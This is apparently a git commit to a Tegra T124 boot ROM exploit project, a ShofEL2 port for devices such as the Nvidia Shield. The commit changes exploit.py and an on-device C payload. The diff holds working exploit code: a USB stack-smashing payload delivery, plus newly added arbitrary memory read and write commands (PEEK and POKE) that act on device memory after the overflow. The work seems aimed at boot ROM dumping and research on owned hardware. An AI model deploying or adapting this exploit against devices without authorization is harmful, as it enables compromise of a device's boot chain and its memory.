Added code that will do memdumping based on architecture, but code is not functioning well on the nvidia shield

2022-08-10 12:20:47 +02:00 · 2022-08-10 12:20:47 +02:00 · 926453f0ea
commit 926453f0ea
parent 91797ccaf9
7 changed files with 75 additions and 8 deletions
--- a/ShofEL2-for-T124/payloads/payload.c
+++ b/ShofEL2-for-T124/payloads/payload.c
@ -35,7 +35,7 @@ void payload_main() {
    usb_log("cmd_handler", &error_code);
    while(1){
        usb_read(&data, 4, &error_code);
-        if(data[0] == 'M' && data[1] == 'E' && data[2] == 'M' && data[3] == 'D') {
+        if(data[0] == 'P' && data[1] == 'E' && data[2] == 'E' && data[3] == 'K') {
            usb_write(&data, 4, &error_code);
            usb_read(&data, 8,&error_code); // Receive uint64_t size and and uint32_t offset
            mem_off = *(uint32_t *)data;
@ -53,6 +53,27 @@ void payload_main() {
                }
            }
        }
+        else if(data[0] == 'P' && data[1] == 'O' && data[2] == 'K' && data[3] == 'E') {
+            usb_write(&data, 4, &error_code);
+            usb_read(&data, 8, &error_code); // Receive uint64_t size and and uint32_t offset
+            mem_off = *(uint32_t *)data;
+            mem_sz = *(uint32_t *)(data+4);
+
+            for(unsigned int i=0;i<mem_sz;i+=0x200) {
+                if((mem_sz - i) < 0x200) {
+                    blk_sz = mem_sz - i;
+                } else {
+                    blk_sz = 0x200;
+                }
+                usb_read((void *) (mem_off + i), blk_sz, &error_code);
+                usb_log("OK", &error_code);
+                usb_read(&data, 4, &error_code);
+
+                if(!(data[0] == 'A' && data[1] == 'C' && data[2] == 'K')) {
+                    break;
+                }
+            }
+        }
        usb_log("done", &error_code);
    }
 }
--- a/pycache/patches.cpython-38.pyc
+++ b/pycache/patches.cpython-38.pyc
--- a/pycache/utils.cpython-38.pyc
+++ b/pycache/utils.cpython-38.pyc
--- a/bootrom_t124.bin
+++ b/bootrom_t124.bin
--- a/dumped_ref0.bin
+++ b/dumped_ref0.bin
--- a/exploit.py
+++ b/exploit.py
@ -107,7 +107,8 @@ class TegraRCM():
                info(f"Done on {fd}")
                return status
            except Exception as e:
-                print(str(e))
+                pass
+                # print(str(e))
        return None

    def __init__(self):
@ -194,12 +195,11 @@ class TegraRCM():
        self.dev.write(rcm_cmd_buf.read())
        payload_file_fd.close()

-    def send_payload(self, payload):
+    def send_payload(self, payload, thumb=1):
        '''
        Sends user specified payload to device
        '''
-
-        self.send_rcm_cmd(payload, 1)
+        self.send_rcm_cmd(payload, thumb)

        #Smash the stack
        status = self.ep0_read_unbounded(BOOTROM_SMASH_LEN)
@ -220,7 +220,7 @@ class TegraRCM():
            error("Error on writing vbar!")

    def memdump_region(self, offset, size):
-        if(not self.send_verify_cmd(b"MEMD")):
+        if(not self.send_verify_cmd(b"PEEK")):
            return
        mem_param = struct.pack('<LL', offset, size)
        self.dev.write(mem_param)
@ -236,6 +236,44 @@ class TegraRCM():
        self.handle_done()
        return received
    
+    def memwrite_region(self, address, data, check=True):
+        '''
+        Write a blob of data to an address on the device. Sometimes this function has issues when writing more than 0x20 bytes of data
+
+        Args:
+
+            :param (int): address: Address to write to
+            :param (bytes): data: Binary data to write to the device
+            :param (Bool): check if data is really written by dumping the region and checking if it has changed
+        '''
+        size = len(data)
+        if(check):
+            before = self.memdump_region(address, size)
+
+        if(not self.send_verify_cmd(b"POKE")):
+            return
+        mem_param = struct.pack('<II', address, size)
+        self.dev.write(mem_param)
+
+        while len(data) > 0:
+            remaining = 0x200
+            if(len(data) < 0x200):
+                remaining = len(data)
+            send = data[:remaining]
+            data = data[remaining:]
+            self.dev.write(send)
+            message = self.dev.read(0x200)
+            if(message != b"OK"):
+                error("Error on writing data to device!")
+                return
+            self.dev.write(b"ACK\x00")
+        self.handle_done()
+        #Read back data
+        if(check):
+            after = self.memdump_region(address, size)
+            if(after == before and send != before):
+                error(f"Memory written succesfully, but no changes detected! | {hex(address)}")
+
    def search_bootrom(self):
        dumped = BytesIO()
        for i in range(0, 0x1000000, 0x10000):
@ -244,7 +282,7 @@ class TegraRCM():
            if(cpsr_to_r0_ins in d or r1_to_cpsr in d):
                info(f"Found cpsr instruction at {hex(i)}")
            print(".", end="")
-        info(f"dumped {hex(len(dumped))} data")
+        # info(f"dumped {hex(len(dumped))} data")

    def dump_bootrom(self):
        d = self.memdump_region(0x100000, 0x1000)
@ -255,6 +293,7 @@ class TegraRCM():
        while True:
            cmd = self.dev.read(0x200)
            if(cmd == b"cmd_handler"):
+                self.memwrite_region(0x40000000, 0x100 * b"\xaa")
                self.search_bootrom()
                #dump memory
                self.dump_bootrom()
@ -263,9 +302,16 @@ class TegraRCM():
 if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("payload", help="Payload to send to the tablet")
+    parser.add_argument("--ga", help="Prepare for GA", action="store_true")

    args = parser.parse_args()
    rcm = TegraRCM()
    rcm.dev.read_chip_id()
    rcm.send_payload(args.payload)
+    if args.ga:
+        d = rcm.dev.read(4)
+        d2 = rcm.dev.read(0x200)
+        if d == b"GiAs": 
+            ok("Device in GA debugger")
+    else:
        rcm.cmd_handler()
--- a/imem_ref0_t124.bin
+++ b/imem_ref0_t124.bin